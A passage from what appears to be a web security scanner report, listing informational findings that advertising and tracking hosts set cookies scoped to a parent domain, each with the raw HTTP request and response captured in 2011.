02:10:58 GMT; path=/; domain=.netmng.com
Content-Length: 688
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38143;sz=1x1;ord=1?'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.bo
...[SNIP]...
12.6. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Set-Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; path=/; domain=.doubleclick.net; expires=Mon, 13 May 2013 10:09:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 24 Jun 2011 13:22:38 GMT
Server: GFE/2.0
Content-Type: text/html

12.7. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1470&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_hbe9=c8z%3A2029o%3A1; rth=2-ll8nk2-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 25 Jun 2011 02:11:00 GMT
Location: http://ads.lucidmedia.com/clicksense/pixel?id=103769&t=i
Connection: close
Set-Cookie: T_hbe9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e5fw=dlx%3A232ib%3A1; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-dlx~232ib~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Content-Length: 0

12.8. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=103769&t=i HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Sat, 25 Jun 2011 02:11:01 GMT
Expires: Sat, 25 Jun 2011 02:11:01 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1307844&t=2
Content-Length: 0
Connection: close

12.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8707574490954974&output=html&h=250&slotname=0966043985&w=300&lmt=1308940014&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922014502&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218&correlator=1308922009816&frm=4&adk=3718087554&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=2&dtd=19&xpc=95bno1LOUQ&p=http%3A//www.gamersdailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CEJozEpiencOrSADIBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDe; PRgo=BBBAAuILBBVCFUE6; PRimp=28A60400-6EA1-2C4A-0209-D6A000040100; PRca=|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:31:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 14924
Set-Cookie:PRvt=CEJozEpiencOrSADIBBeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDeJWuEpnU4MzRwAAFBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=75A60400-3338-7034-0309-5AE000050101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJyC*1646:2|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJyCAA08:2|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FADR:2|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GBLt:2|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FADRGBLt:2|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
12.10. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 24 Jun 2011 06:48:10 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma:
X-FB-Rev: 396710
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.27.247.105
X-Cnection: close
Date: Fri, 24 Jun 2011 13:46:10 GMT
Content-Length: 251

fb_sharepro_render([{"url":"http:\/\/www.ea.com\/1\/product-eulas","normalized_url":"http:\/\/www.ea.com\/1\/product-eulas","share_count":7,"like_count":0,"comment_count":0,"total_count":7,"click_coun
...[SNIP]...
12.11. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1308922027.341,wait-%3E10000,&1308922029900 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
12.12. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=176708751&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Farticle.wn.com%252Fview%252F2011%252F02%252F08%252FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%252F%26jsref%3D%26rnd%3D1308922054552&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&jsref=&rnd=1308922054552
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:27:33 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:27:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.13. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=208147318&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fsourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%26ad%3D6429295350%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D&d.r=http%3A%2F%2Fwww.pogo.com%2Flogin%2Fentry.jsp%3Fsl%3D1%26site%3Dpogo%26redr%3Dhttp%253A%252F%252Fwww.pogo.com%252Fpogo-online-games%252Flp-GeneralPogo-withoutFB.jsp%253Fad%253D6429295350%2526sourceid%253Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%2526kw%253Dfree%252Binternet%252Bgames%2526site HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:30:36 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:30:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
12.14. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=242390407&c4=206438376&c5=1&c6=14&c7=tue%20may%2017%2020%3A12%3A51%202011&c8=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&c9=GDN%3A%2040%25%20of%20Internet%20Users%20Play%20Casual%20Games%20Says%20Spil&c10=&c15=&1308922008562 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
